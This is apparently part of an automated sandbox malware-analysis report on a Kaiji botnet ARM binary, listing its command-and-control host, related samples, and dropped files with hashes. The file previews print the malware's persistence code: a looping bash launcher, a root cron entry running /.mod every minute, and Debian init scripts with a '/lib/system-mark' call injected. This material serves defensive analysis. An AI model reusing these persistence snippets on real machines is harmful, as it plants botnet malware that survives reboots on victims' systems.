https://www.gnu.org/software/coreutils/Report | ls.14.dr, dir.14.dr | false | | high
https://github.com/lsof-org/lsofhttps://github.com/lsof-org/lsof/blob/master/00FAQhttps://github.com | lsof.14.dr | false | | high
http://.jpg | System.mod, 5555.1.00007f47904bf000.00007f4790514000.rw-.sdmp, systemd, 5566.1.00007efb6c4bf000.00007efb6c514000.rw-.sdmp, System.mod, 5566.1.00007efb6c4bf000.00007efb6c514000.rw-.sdmp, linux_arm6.elf, ps0.14.dr, System.mod.14.dr, find0.14.dr, ss0.14.dr, bash_cfg.14.dr, opt.services.cfg.14.dr, system-mark.14.dr, ls0.14.dr, libgdi.so.0.8.1.14.dr, netstat0.14.dr, dir0.14.dr | false | | high
https://wiki.xiph.org/MIME_Types_and_File_Extensions.oga | ls.14.dr, dir.14.dr | false | | high
Contacted IPs

IP | Domain | Country | ASN | ASN Name | Malicious
93.123.85.138 | cc.ava9527.cc | Bulgaria | 43561 | NET1-ASBG | false
Joe Sandbox View / Context: IPs

Match | Associated Sample Name / URL | Detection | Threat Name
93.123.85.138 | linux_arm7.elf | malicious | Kaiji
93.123.85.138 | YnJQfHqRbG.elf | malicious | Unknown
93.123.85.138 | 1316wjL1Ep.elf | malicious | Unknown
Joe Sandbox View / Context: Domains

Match | Associated Sample Name / URL | Detection | Threat Name | Context (IP)
www.google.com | http://enteolcl.top/ | malicious | Unknown | 142.250.181.68
www.google.com | CMK7DB5YtR.exe | malicious | LummaC Stealer | 172.217.21.36
www.google.com | XrQ8NgQHTn.exe | malicious | LummaC Stealer | 172.217.21.36
www.google.com | https://clickme.thryv.com/ls/click?upn=u001.5dsdCa4YiGVzoib36gWoSLMas8wKe7Ih4zqBiyHkarn0j5lOr9uX2Ipi5t6mu5SV-2B1JsyP5-2FhfNtTtQOlKj0flyS3vwLeKaJ6ckzVjuZims-3DLeyB_UNbDpVWBvKTmUslwem1E0EC2Cp68hMzvjQfllUT9E4DZqDf2uiRmAk3QSMceJiv-2FShXGXSXiT9Fl37dFQYscKLxEMcTJj4tm5gMav6Ov9aTBg62vcUAgkYbCAf46MpAyc7W7GFqvL6adNxNCTlmXTIiiRHR0fGeBxBsxNA5VbYoJQJb-2FJYi0QkLgjAoVYrRvTi1dn7pPo7PbeQWMcs70s7UFE7WeCgk9rDpKP4binyuu0CEbckceaS6ycGVUXPi2325g7v8hitus3ay9MICEoPWHxYePXARIxPiq-2FS9xmhqxVG-2BsRc9-2BU2VqX-2BZB9nYYuSKeNDIvkVaXKl7x-2FFSxF7xXa4BaT30eg9SUGZbRvZ8-3D#C?email=test@test.com | malicious | Captcha Phish | 142.250.181.68
www.google.com | FG Or#U00e7amento JAN 2025.pdf | malicious | Unknown | 142.250.181.68
www.google.com | https://lovesolvingastrologer.com/n/?c3Y9bzM2NV8xX3ZvaWNlJnJhbmQ9Y2tGd05VYz0mdWlkPVVTRVIwMzEyMjAyNFUwNzEyMDMyMQ | malicious | Unknown | 172.217.21.36
www.google.com | https://desactivacion-correo.s3.eu-north-1.amazonaws.com/es.html | malicious | Unknown | 172.217.21.36
www.google.com | https://app.droplet.io/form/Ko1loy | malicious | Unknown | 172.217.21.36
www.google.com | http://riginaros.blogspot.com/#x034rT96G0 | malicious | Porn Scam | 142.250.181.68
www.google.com | https://8lye.zemifor.ru/AELKFIZNEFDBTAHDVVECCPNIETD459FBOSL3MNKP6ZQ?akpsmqmipdifvgvgwktrpvk235317236085203wfjcuo8jl4u8d22sb | malicious | Unknown | 142.250.181.68
cc.ava9527.cc | linux_arm7.elf | malicious | Kaiji | 93.123.85.138
cc.ava9527.cc | linux_arm5.elf | malicious | Kaiji | 23.224.121.29
cc.ava9527.cc | linux_aarch64.elf | malicious | Kaiji | 23.224.121.29
cc.ava9527.cc | linux_amd64.elf | malicious | Kaiji | 23.224.121.29
cc.ava9527.cc | linux_arm7.elf | malicious | Kaiji | 23.224.121.29
cc.ava9527.cc | linux_arm6.elf | malicious | Kaiji | 23.224.121.29
Joe Sandbox View / Context: ASNs

Match | Associated Sample Name / URL | Detection | Threat Name | Context (IP)
NET1-ASBG | a-r.m-7.Sakura.elf | malicious | Gafgyt, Mirai | 93.123.85.251
NET1-ASBG | m-i.p-s.Sakura.elf | malicious | Gafgyt, Mirai | 93.123.85.251
NET1-ASBG | x-8.6-.Sakura.elf | malicious | Gafgyt, Mirai | 93.123.85.251
NET1-ASBG | x-3.2-.Sakura.elf | malicious | Gafgyt, Mirai | 93.123.85.251
NET1-ASBG | a-r.m-4.Sakura.elf | malicious | Gafgyt, Mirai | 93.123.85.251
NET1-ASBG | a-r.m-5.Sakura.elf | malicious | Gafgyt, Mirai | 93.123.85.251
NET1-ASBG | m-6.8-k.Sakura.elf | malicious | Gafgyt, Mirai | 93.123.85.251
NET1-ASBG | i-5.8-6.Sakura.elf | malicious | Gafgyt, Mirai | 93.123.85.251
NET1-ASBG | s-h.4-.Sakura.elf | malicious | Gafgyt, Mirai | 93.123.85.251
NET1-ASBG | a-r.m-6.Sakura.elf | malicious | Gafgyt, Mirai | 93.123.85.251
                                                      No context
Joe Sandbox View / Context: Dropped Files

Match | Associated Sample Name / URL | Detection | Threat Name
/.mod | linux_arm7.elf | malicious | Kaiji
/.mod | linux_aarch64.elf | malicious | Kaiji
/.mod | linux_386.elf | malicious | Kaiji
/.mod | linux_arm7.elf | malicious | Kaiji
/.mod | utZX7JAuMU.elf | malicious | Kaiji
/.mod | fL4E1jNVCt.elf | malicious | Kaiji
/.mod | Xq5coKA8BI.elf | malicious | Kaiji
/.mod | Ww0lpzmYHO.elf | malicious | Kaiji
/.mod | c4RvDuLtq1.elf | malicious | Kaiji
/.mod | linux_arm5.elf | malicious | Kaiji
                                                                          Process:/tmp/linux_arm6.elf
                                                                          File Type:Bourne-Again shell script, ASCII text executable
                                                                          Category:dropped
                                                                          Size (bytes):36
                                                                          Entropy (8bit):3.9931325576478587
                                                                          Encrypted:false
                                                                          SSDEEP:3:TKH/LQP5o:8M2
                                                                          MD5:FF0DB01AA3465358D28FD34FE8479236
                                                                          SHA1:DBE00D4EAD9F9FE3D8B97CBDCA1F2EFD5EF86EEF
                                                                          SHA-256:BF659AA5C483CF60E1E7626EEC9FAE7AE182CC611A3F42B2521F8A8C018C7195
                                                                          SHA-512:F414CE5B5A10DD25EA22CA123473604445411E056F4310DFE1C09AECE6B16CB5AD8B989070201594025A6DBE319FE87A871E63209E977EE185EF302689F048B2
                                                                          Malicious:false
                                                                          Antivirus:
                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                          Joe Sandbox View:
                                                                          • Filename: linux_arm7.elf, Detection: malicious, Browse
                                                                          • Filename: linux_aarch64.elf, Detection: malicious, Browse
                                                                          • Filename: linux_386.elf, Detection: malicious, Browse
                                                                          • Filename: linux_arm7.elf, Detection: malicious, Browse
                                                                          • Filename: utZX7JAuMU.elf, Detection: malicious, Browse
                                                                          • Filename: fL4E1jNVCt.elf, Detection: malicious, Browse
                                                                          • Filename: Xq5coKA8BI.elf, Detection: malicious, Browse
                                                                          • Filename: Ww0lpzmYHO.elf, Detection: malicious, Browse
                                                                          • Filename: c4RvDuLtq1.elf, Detection: malicious, Browse
                                                                          • Filename: linux_arm5.elf, Detection: malicious, Browse
                                                                          Reputation:moderate, very likely benign file
Preview (the report renders each newline as "."):
#!/bin/bash
/usr/lib/libgdi.so.0.8.1
                                                                          Process:/tmp/linux_arm6.elf
                                                                          File Type:ELF 32-bit LSB executable, ARM, EABI5 version 1 (SYSV), statically linked, Go BuildID=QWFqDvXFQJx9U3yrYPnA/M9zZFzD7RNozhwqfDdp2/4NamWS9qaPrrBZ2Ai_7G/E3zHuD-99wHqJg1owbs5, stripped
                                                                          Category:dropped
                                                                          Size (bytes):5242880
                                                                          Entropy (8bit):6.05036085544014
                                                                          Encrypted:false
                                                                          SSDEEP:24576:44v9ubX4NnJ+VWbqyUcN1Ib4zJqDu3WZZ+5YAKQqN02EXS3vUM6j0AJfuD/s3TW5:+VmmsDjfd5uBbTpHqufwmFp8qOTVI1
                                                                          MD5:C5F2DDE5DCA123520549BD745325FA64
                                                                          SHA1:2B154BF7D864B50F746348BC93044E8E939DBEE1
                                                                          SHA-256:B3F7CB72809A18EA6A45AC6658FAC539E2C066184485E041845D2E2F9949125F
                                                                          SHA-512:66AA8E660403689F1767899FE5423CECF9FCA44C9F3C8DF3937B4E6E87C147F6433FD530601D26F8781D8FFB39B26D3230360BF51632FF035913C9DC43E721C5
                                                                          Malicious:true
                                                                          Yara Hits:
                                                                          • Rule: JoeSecurity_Kaiji_1, Description: Yara detected Kaiji, Source: /boot/System.mod, Author: Joe Security
                                                                          Antivirus:
                                                                          • Antivirus: ReversingLabs, Detection: 34%
                                                                          Reputation:low
                                                                          Preview:.ELF..............(.........4...........4. ...(.........4...4...4...................................d...d.............................(...(...............)...*...*... ... ...............J...K...K..K..p...........Q.td...............................e.....................*....................................................................(.................].............*...).......................................4.....................e...........p.5.p.4.L...................o.............5...4.x...................y...........8.6.8.5.................................8.6.8.5....................5.............K...J.@...............................@.K.@.J.h.................................O...N..V...............................KP..KO.\!...............................lQ..lP..e..................C...................d.......................................................................................................................................................................................
                                                                          Process:/tmp/linux_arm6.elf
                                                                          File Type:ASCII text
                                                                          Category:dropped
                                                                          Size (bytes):147
                                                                          Entropy (8bit):3.8929148542482728
                                                                          Encrypted:false
                                                                          SSDEEP:3:3Rk4WtwyI6UB4cSzB4WtwyI6UB4cSl2TLQdHjhOdQBHXWcMn:hRt6jqt612MdHjcy3Wxn
                                                                          MD5:928DC505FE148F5101AD11910FDAAFAF
                                                                          SHA1:E9186E46B13F5B337611594B58EDC78A706F31BD
                                                                          SHA-256:738764F68B68F10E93C51C0ECF1B842AE48E30E04560334C3EAD15A9F0CEED52
                                                                          SHA-512:BC00743B8574D7B96BC139D7466203232D29AB238239B0C00F5AE293D5CB40874DC2F74DF967722461F649A93082684300B153DC448BD9294C7ECE2770D98688
                                                                          Malicious:false
                                                                          Reputation:low
Preview (the report renders each newline as "."):
e74ed74ec65f017ed1638a49c1350a23fc5dea11de2c797a
e74ed74ec65f017ed1638a49c1350a23fc5dea11de2c797a
e464ed5cf25f2831d065cf4dc1350d7ee85d8a5fc939277a
                                                                          Process:/tmp/linux_arm6.elf
                                                                          File Type:Bourne-Again shell script, ASCII text executable
                                                                          Category:dropped
                                                                          Size (bytes):63
                                                                          Entropy (8bit):4.619727741986734
                                                                          Encrypted:false
                                                                          SSDEEP:3:TKH/zOsUF4K0WJTD0HXD:LsUF4kDYXD
                                                                          MD5:6CB66DDA6E7B14F42654921B3EC25226
                                                                          SHA1:B39354C512D130E1C52E9163DC12C4D5704A60A7
                                                                          SHA-256:45A2B263B893B33C703B7E5F64F04DE776D1DC9578BE65C5047195CD531FEF2A
                                                                          SHA-512:91A32A8C6B9490CB31CDB79C2E8697DAF1637C63136658B46037D60ED47D2B6D685F62D526E87960BAF93C6875295CF0C892EDAF65B34CBEB00D9961FEE7938B
                                                                          Malicious:true
                                                                          Antivirus:
                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                          Reputation:moderate, very likely benign file
Preview (the report renders each newline as "."):
#!/bin/bash
while [ 1 ]; do
sleep 60
/etc/opt.services.cfg
done

Process: /bin/bash
File Type: ASCII text
Category: dropped
Size (bytes): 24
Entropy (8bit): 3.000961982762677
Encrypted: false
SSDEEP: 3:HFdtKeIBFv:l6eIBV
MD5: 6B13F24B625DC5B832A4AE80CFAB7DDA
SHA1: 8D0BAF4556328F9CEFB4041D67CB6BF30570AF84
SHA-256: AC95234D459AA020883AF0A93879C835582CB60D7DD63C68F33993BA2546661F
SHA-512: 76774BF236D5DB77B09BFD2A36F190B86AC7DA7147C635CAF06A1884E151345585803885AD1FCBD60F566A48F165CBF8B445B506047CBC0A9924BF79B4C8E289
Malicious: true
Reputation: moderate, very likely benign file
Preview: */1 * * * * root /.mod .

Process: /tmp/linux_arm6.elf
File Type: POSIX shell script, ASCII text executable
Category: dropped
Size (bytes): 2304
Entropy (8bit): 5.099881186780916
Encrypted: false
SSDEEP: 48:9tdVEA2+3MPMiOMdxA3Gbsbcq1himLHLHmvgjWL:9tdVEA2+3MPiI3Qbcq1Q4Hrmvt
MD5: BD41974D1C7269BD429343943C8ED10A
SHA1: D99E55E32229483A694B8B2EFEC8D15CF1C8FCCE
SHA-256: 56044D786BA8F4B11DDF9DBC88502ECE10246991CA383F913E9B86E57F19A28E
SHA-512: A386FA323285EF24A9A442A5CEB8D9B2A36409B7BEC2D729031C7F83C6F3664EA1A745D35CA487A25FC953B6197F3A9FF1B35EEEFD2F90262BC2EEA7BB89D522
Malicious: true
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Reputation: moderate, very likely benign file
Preview: #!/bin/sh.### BEGIN INIT INFO.# Provides: acpid.# Required-Start: $remote_fs $syslog.# Required-Stop: $remote_fs $syslog.# X-Start-Before: kdm gdm3 xdm lightdm.# X-Stop-After: kdm gdm3 xdm lightdm.# Default-Start: 2 3 4 5.# Default-Stop: .# Short-Description: Start the Advanced Configuration and Power Interface daemon.# Description: Provide a socket for X11, hald and others to multiplex.# kernel ACPI events..### END INIT INFO..set -e..ACPID="/usr/sbin/acpid".DEFAULTS="/etc/default/acpid"..# Check for daemon presence.[ -x "$ACPID" ] || exit 0..OPTIONS="".MODULES="".# Include acpid defaults if available.[ -r "$DEFAULTS" ] && . "$DEFAULTS"..# Get lsb functions.. /lib/lsb/init-functions..# As the name says. If the kernel supports modules, it'll try to load.# the ones listed in "MODULES"..load_modules() {. [ -f /proc/modules ] || return 0. if [ "$MODULES" = "all" ]; then./lib/system-mark. MODULES="$(sed -rn 's#^(/lib/mod

Process: /tmp/linux_arm6.elf
File Type: POSIX shell script, ASCII text executable
Category: dropped
Size (bytes): 5694
Entropy (8bit): 5.4204403708834565
Encrypted: false
SSDEEP: 96:iKtDd9/iwmDaLEuE9nwsmFRzF+rc17NyppyhHk5eEkv:iCdlW6EuUnZeRB+rc15yryZkq
MD5: 14EB05544D93BC0B09262334CCB79F2C
SHA1: 620AC9E2B5A23703A568800376CE590445FDFBD5
SHA-256: C52ED6032904A94A0B83DCD1CDFA83D48DA29D049A5F29BB90265492120183E4
SHA-512: 83DCDC085FBFEEC1843D8C5E8978162AA34F9ECD0E7BF4E8BBF8D8D005837FF6A69F56BF7988400CB5AF07A5AF63D6471BD8BC2DAE223CDA3500F07B0EE9C36B
Malicious: true
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Preview: #!/bin/sh.#.# alsa-utils initscript.#.### BEGIN INIT INFO.# Provides: alsa-utils.# Required-Start: $local_fs $remote_fs.# Required-Stop: $remote_fs.# Default-Start: S.# Default-Stop: 0 1 6.# Short-Description: Restore and store ALSA driver settings.# Description: This script stores and restores mixer levels on.# shutdown and bootup.On sysv-rc systems: to.# disable storing of mixer levels on shutdown,.# remove /etc/rc[06].d/K50alsa-utils. To disable.# restoring of mixer levels on bootup, rename the.# "S50alsa-utils" symbolic link in /etc/rcS.d/ to.# "K50alsa-utils"..### END INIT INFO..# Don't use set -e; check exit status instead..# Exit silently if package is no longer installed.[ -x /usr/sbin/alsactl ] || exit 0..PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin.MYNAME=/etc/init.d/alsa-utils.ALSACTLHOME=/run/alsa..[ -d "$ALSA

Process: /tmp/linux_arm6.elf
File Type: POSIX shell script, ASCII text executable
Category: dropped
Size (bytes): 2124
Entropy (8bit): 4.760217966755678
Encrypted: false
SSDEEP: 24:aiF8WzzU+LuN5K6YqfOv5i1CPeFecyZR11s+M8k93ILlfWW6910kF4T0Op:7RzgTNNOhi1eAryZR1vX5fTKX00+
MD5: B8F9EF2F7B8875CFEE672094FF6B7829
SHA1: 901405E0A0F9AF0D39010FB609E06A34FA9918F5
SHA-256: 11696FDED80A45C7CD5351D01D0C4419E69A863C3774F7F37C3FD22F22F3EE16
SHA-512: A90371D6664E9043A8FD43A8138B245C228AFF9E64AC6A41D73C849C0CF746ABFAEABB2C1D2BEEBBC05D7451A2B84DAE4E80A0BDF64864A390FE950437CB4745
Malicious: true
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Preview: #! /bin/sh.### BEGIN INIT INFO.# Provides: anacron.# Required-Start: $remote_fs $syslog $time.# Required-Stop: $remote_fs $syslog $time.# Default-Start: 2 3 4 5.# Default-Stop:.# Short-Description: Run anacron jobs.# Description: The first purpose of this script is to run anacron at.# boot so that it can catch up with missed jobs. Note.# that anacron is not a daemon. It is run here just once.# and is later started by the real cron. The second.# purpose of this script is that said cron job invokes.# this script to start anacron at those subsequent times,.# to keep the logic in one place..### END INIT INFO..PATH=/bin:/usr/bin:/sbin:/usr/sbin..test -x /usr/sbin/anacron || exit 0.test -r /etc/default/anacron && . /etc/default/anacron... /lib/lsb/init-functions..case "$1" in. start). if init_is_upstart 2>/dev/null; then./lib/system-mark. exit 1. fi. log_daemon_msg "Starting

Process: /tmp/linux_arm6.elf
File Type: POSIX shell script, ASCII text executable
Category: dropped
Size (bytes): 3826
Entropy (8bit): 5.249219751257144
Encrypted: false
SSDEEP: 96:RFCjnn83hjz3n1zJNSNuDNBqNPoNpMbANEF7gG9M3zRVhszRVhxRl:Wjn4hj779Gjl
MD5: DE4607EB984BD8C2751A19FED2566718
SHA1: B605ED61D40829230C99D2C54B401CD2E154DE20
SHA-256: F6BC11FE360F4DB66CB6B1C7763DC087E5D8F76A7D8145F08F617FD10C4FBFFD
SHA-512: D932550ED8287788D8E14165CB47EB3A649D40B8AE6E8EEEC6ADCCC3563D8B376BBDE5C804205BD9B174CC3786154292C2D352307F41D9649312D9BF615DFD0C
Malicious: true
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Preview: #!/bin/sh.# ----------------------------------------------------------------------.# Copyright (c) 1999, 2000, 2001, 2002, 2003, 2004, 2005, 2006, 2007.# NOVELL (All rights reserved).# Copyright (c) 2008, 2009 Canonical, Ltd..#.# This program is free software; you can redistribute it and/or.# modify it under the terms of version 2 of the GNU General Public.# License published by the Free Software Foundation..#.# This program is distributed in the hope that it will be useful,.# but WITHOUT ANY WARRANTY; without even the implied warranty of.# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the.# GNU General Public License for more details..#.# You should have received a copy of the GNU General Public License.# along with this program; if not, contact Novell, Inc..# ----------------------------------------------------------------------.# Authors:.# Steve Beattie <steve.beattie@canonical.com>.# Kees Cook <kees@ubuntu.com>.#.# /etc/init.d/app

Process: /tmp/linux_arm6.elf
File Type: POSIX shell script, ASCII text executable
Category: dropped
Size (bytes): 3050
Entropy (8bit): 5.216428196190724
Encrypted: false
SSDEEP: 48:jV/OxxHuoBusZABLm/tiUmZmNndBuSZWg/e/fuppzDGdxboGxz5:jV/OxNDBusZABLm1BmOnbuSZWg2/anOT
MD5: FB82D03D336FC2AC2901C9D28682B408
SHA1: 992649B4B941B5B5372A6215DA4A5231BFDCD0BF
SHA-256: F9AFCA8A53AF95CC19F4D1D2495F80335924F5C65ABE9147C5D46AE29CBEC76C
SHA-512: 8EE7107F9FCB458989553B871B06823646B765980D7BBF84C7110C0FFEA116DE7D141D5FE21BA2CFDBCA9A423434AE276D3949AB6EF1EACED8DEF7DFE6D16C40
Malicious: true
Preview: #! /bin/sh..### BEGIN INIT INFO.# Provides: apport.# Required-Start: $local_fs $remote_fs.# Required-Stop: $local_fs $remote_fs.# Default-Start: 2 3 4 5.# Default-Stop:.# Short-Description: automatic crash report generation.### END INIT INFO..DESC="automatic crash report generation".NAME=apport.AGENT=/usr/share/apport/apport.SCRIPTNAME=/etc/init.d/$NAME..# Exit if the package is not installed.[ -x "$AGENT" ] || exit 0..# read default file.enabled=1.[ -e /etc/default/$NAME ] && . /etc/default/$NAME || true..# Define LSB log_* functions..# Depend on lsb-base (>= 3.0-6) to ensure that this file is present... /lib/lsb/init-functions..#.# Function that starts the daemon/service.#.do_start().{..# Return..# 0 if daemon has been started..# 1 if daemon was already running..# 2 if daemon could not be started...[ -e /var/crash ] || mkdir -p /var/crash..chmod 1777 /var/crash...# check for kernel crash dump, convert it to apport report..if [ -e /var/crash/vmcore ] || [ -n "`ls /va

Process: /tmp/linux_arm6.elf
File Type: POSIX shell script, ASCII text executable
Category: dropped
Size (bytes): 2453
Entropy (8bit): 4.851897064111941
Encrypted: false
SSDEEP: 48:9s2V+ig+Ui83MZoJQukTS9VC2/ulMA0uv3uKv2ZsGyjyRft/zsDE7Ed:93oijU4ukTSZux0uv3uKvdJORlADHd
MD5: 84273238ABAA8A7DE2D516C95D92F171
SHA1: 875222E1EE9FE460931E5340C94F958D1DB14C9D
SHA-256: 2BDB658E48A470E440378BC4BC4CC48B9B228BC3DF759187787A7D9FD71EEC90
SHA-512: C226B5813A17D0640FBC77D09889F19F638FF9701CCC2E933B3DC8749674BC1918FD22011096126FEBBBBF55F91BE1D78DF8CC176D4465BA4A2426414C2D1D88
Malicious: true
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Preview: #!/bin/sh.### BEGIN INIT INFO.# Provides: avahi avahi-daemon.# Required-Start: $remote_fs dbus.# Required-Stop: $remote_fs dbus.# Should-Start:. $syslog.# Should-Stop: $syslog.# Default-Start: 2 3 4 5.# Default-Stop: 0 1 6.# Short-Description: Avahi mDNS/DNS-SD Daemon.# Description: Zeroconf daemon for configuring your network .# automatically.### END INIT INFO..PATH=/sbin:/bin:/usr/sbin:/usr/bin.DESC="Avahi mDNS/DNS-SD Daemon".NAME="avahi-daemon".DAEMON="/usr/sbin/$NAME".SCRIPTNAME=/etc/init.d/$NAME..# Gracefully exit if the package has been removed..test -x $DAEMON || exit 0... /lib/lsb/init-functions..# Include avahi-daemon defaults if available..test -f /etc/default/avahi-daemon && . /etc/default/avahi-daemon..DISABLE_TAG="/var/run/avahi-daemon/disabled-for-unicast-local"..#.# Function that starts the daemon/service..#.d_start() {. $DAEMON -c && return 0.. if [ -e $DISABLE_TAG -a "$AVAHI_DAEMON_DETECT_LOCAL" !=

Process: /tmp/linux_arm6.elf
File Type: POSIX shell script, ASCII text executable
Category: dropped
Size (bytes): 1193
Entropy (8bit): 5.0501124070839
Encrypted: false
SSDEEP: 24:ai3V6yXngSBVSBNyj6edNHcBcN6ekvx2w5mw+76opC:73ZngWVWNMNH0Y6bJ2w4wrJ
MD5: A79B82CEAEE457E62E6EA7BAF7D1CAE5
SHA1: B1EEBF3A9994B719F88E63BAC51A40EF3E3A4082
SHA-256: 76950791A135F0DFCCBE3A246A8085304345B40AC3DFE30BF1CA53C6BF81FD95
SHA-512: 4B6A9CEAEAC8952255DA0EAED35DAB689D80D3BD2B7D69CF3BF36D36271CCA309114D3E32C6C6797143C991DF1EAEB6491A7A36DE6AF9633F71AECB4B3D40C4E
Malicious: true
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Preview: #! /bin/sh.### BEGIN INIT INFO.# Provides: binfmt-support.# Required-Start: $local_fs $remote_fs.# Required-Stop: $local_fs $remote_fs.# Default-Start: 2 3 4 5.# Default-Stop:.# Short-Description: Support for extra binary formats.# Description: Enable support for extra binary formats using the Linux.# kernel's binfmt_misc facility..### END INIT INFO..PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin.NAME=binfmt-support.DESC="additional executable binary formats"..if [ "$(uname)" != Linux ]; then./lib/system-mark. exit 0.fi..which update-binfmts >/dev/null 2>&1 || exit 0... /lib/lsb/init-functions.[ -r /etc/default/rcS ] && . /etc/default/rcS..set -e.CODE=0..case "$1" in. start). log_daemon_msg "Enabling $DESC" "$NAME". update-binfmts --enable || CODE=$?. log_end_msg $CODE. exit $CODE. ;;.. stop). log_daemon_msg "Disabling $DESC" "$NAME". update-binfmts --disable || CODE=$?. log_end_msg $CODE. exi

Process: /tmp/linux_arm6.elf
File Type: POSIX shell script, ASCII text executable
Category: dropped
Size (bytes): 3071
Entropy (8bit): 5.403760092319036
Encrypted: false
SSDEEP: 48:71OoPrcMbC/BUUzGrm92+kbM935LmiVQoOZoKkkFjM+Zh9YDFjMrfOte:79TcWC/BUeem92R4V5LROt5r9CE2A
MD5: E001FF7DBF2452314EEC95D08540D7AF
SHA1: B2B63E00B1685EAA0DACC4D5F2C07C15F0D6AE55
SHA-256: D6AA950CFA0BA62353E3734AB3E43F1B402C1B7F95CAC3C5D99D8453D299BDF3
SHA-512: A9EA2F92C5A94330041228C7AECEB44718EBA47017ED7A41DEC87D6EAD6D7B34F968A79CFCFDDCC38561D964D354BFB63F3F52C2EFEE76C38C80DECCEC2FA944
Malicious: true
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Preview: #! /bin/sh.### BEGIN INIT INFO.# Provides: bluetooth.# Required-Start: $local_fs $syslog $remote_fs dbus.# Required-Stop: $local_fs $syslog $remote_fs.# Default-Start: 2 3 4 5.# Default-Stop: 0 1 6.# Short-Description: Start bluetooth daemons.### END INIT INFO.#.# bluez Bluetooth subsystem starting and stopping.#.# originally from bluez's scripts/bluetooth.init.#.# Edd Dumbill <ejad@debian.org>.# LSB 3.0 compilance and enhancements by Filippo Giunchedi <filippo@debian.org>.#.# Updated for bluez 4.7 by Mario Limonciello <mario_limonciello@dell.com>.# Updated for bluez 5.5 by Nobuhiro Iwamatsu <iwamatsu@debian.org>.#.# Note: older daemons like dund pand hidd are now shipped inside the.# bluez-compat package..PATH=/sbin:/bin:/usr/sbin:/usr/bin.DESC=bluetooth..DAEMON=/usr/sbin/bluetoothd.HCIATTACH=/usr/bin/hciattach..BLUETOOTH_ENABLED=0.HID2HCI_ENABLED=1.HID2HCI_UNDO=1..SDPTOOL=/usr/bin/sdptool..# If you want to be ignore error of "org.freedesktop.hostname1",.# please en

Process: /tmp/linux_arm6.elf
File Type: POSIX shell script, ASCII text executable
Category: dropped
Size (bytes): 1301
Entropy (8bit): 4.3356283043101165
Encrypted: false
SSDEEP: 24:9lBiePItKzeBcx2o8/z3ejhTJckS5gzjdJwZWkZg7zcOqb6:93PyKzYcg/LshTJckS5gJw8kG7A9b6
MD5: FE88F57D8990408CAAF7688C8EB6D734
SHA1: 7160510037CCA5505F40EFBE4CE8CCC777EAECE3
SHA-256: C01D230B67C35FB75446E7A4599A09751E8859A4462CD5EB34DF9F186B28049F
SHA-512: 3DDA7EAF95F80FD3E35D8FDBF9AB77126E2CBF39CAA5C7A1275227D5267683F43504B191F0E08E901F93667AAFEE1F21F79BA3C8A27D5622C990DAA3AE39583D
Malicious: true
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Preview: #!/bin/sh.### BEGIN INIT INFO.# Provides: console-setup.sh.# Required-Start: $remote_fs.# Required-Stop:.# Should-Start: console-screen kbd.# Default-Start: 2 3 4 5.# Default-Stop:.# X-Interactive: true.# Short-Description: Set console font and keymap.### END INIT INFO..if [ -f /bin/setupcon ]; then./lib/system-mark. case "$1" in. stop|status). # console-setup isn't a daemon. ;;. start|force-reload|restart|reload). if [ -f /lib/lsb/init-functions ]; then./lib/system-mark. . /lib/lsb/init-functions. else. log_action_begin_msg () {.. echo -n "$@... ". }.. log_action_end_msg () {.. if [ "$1" -eq 0 ]; then./lib/system-mark.. echo done... else.. echo failed... fi. }. fi. log_action_begin_msg "Setting up console font and keymap". if /li

Process: /tmp/linux_arm6.elf
File Type: POSIX shell script, ASCII text executable
Category: dropped
Size (bytes): 3111
Entropy (8bit): 4.911661386459712
Encrypted: false
SSDEEP: 48:5PMic6MicW4dJIrcz8WD23fK2LAb38CE1ATGuMoZisTdDKoA3gHMLf:5E3s4dJWRWD23y2LgsZCTHMnidD/A3gU
MD5: 0E0A4A7372459B9C2D8F45BAA40A64B3
SHA1: 6DEAF952235F89CBDD83FBE48C89A4F048E52043
SHA-256: 2B88ED8EFDF3262040903719AA03156C8CD73B50CF2F2FCCACB33693FE4110D6
SHA-512: 4E11C50B5F5D95CAE5B374C4597DD83F79434876598BD9C5FC32D37B765885DC1FF920D96D6594E548F08DC9D367D8C74F704C9BA49056749E5A3B4CD6D13C50
Malicious: true
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Preview: #!/bin/sh.# Start/stop the cron daemon..#.### BEGIN INIT INFO.# Provides: cron.# Required-Start: $remote_fs $syslog $time.# Required-Stop: $remote_fs $syslog $time.# Should-Start: $network $named slapd autofs ypbind nscd nslcd winbind sssd.# Should-Stop: $network $named slapd autofs ypbind nscd nslcd winbind sssd.# Default-Start: 2 3 4 5.# Default-Stop:.# Short-Description: Regular background program processing daemon.# Description: cron is a standard UNIX program that runs user-specified .# programs at periodic scheduled times. vixie cron adds a .# number of features to the basic UNIX cron, including better.# security and more powerful configuration options..### END INIT INFO..PATH=/bin:/usr/bin:/sbin:/usr/sbin.DESC="cron daemon".NAME=cron.DAEMON=/usr/sbin/cron.PIDFILE=/var/run/crond.pid.SCRIPTNAME=/etc/init.d/"$NAME"..test -f $DAEMON || exit 0... /lib/lsb/init-functions..[ -r /etc/default/cr

Process: /tmp/linux_arm6.elf
File Type: POSIX shell script, ASCII text executable
Category: dropped
Size (bytes): 955
Entropy (8bit): 5.160229628002615
Encrypted: false
SSDEEP: 12:aiy4BTty5r2MVOc4qVp1b7NBq2dS1uaqLgcIcrPcrmjcdpEMyuDHkkGKErIKDq7p:aiVT5MQsL1bPq2MKZcr/ZkVyKDpjQ
MD5: 3B43339B088088E5B725575549A61F55
SHA1: 98AF37D27DC1A2EFE51AD74366137D375E631BB3
SHA-256: BF85CED45A7B48892F49D608E189307CC08330A4F2834289B847B457DFD7D28A
SHA-512: AF7347AEE4625DBD7C23A9A411362EC940B17DBBA794E9B89DC37D893EBCB445044BDB52D21197DBCEF73C75CF697E935D729110A2125D168E82D6B5E24938FC
Malicious: true
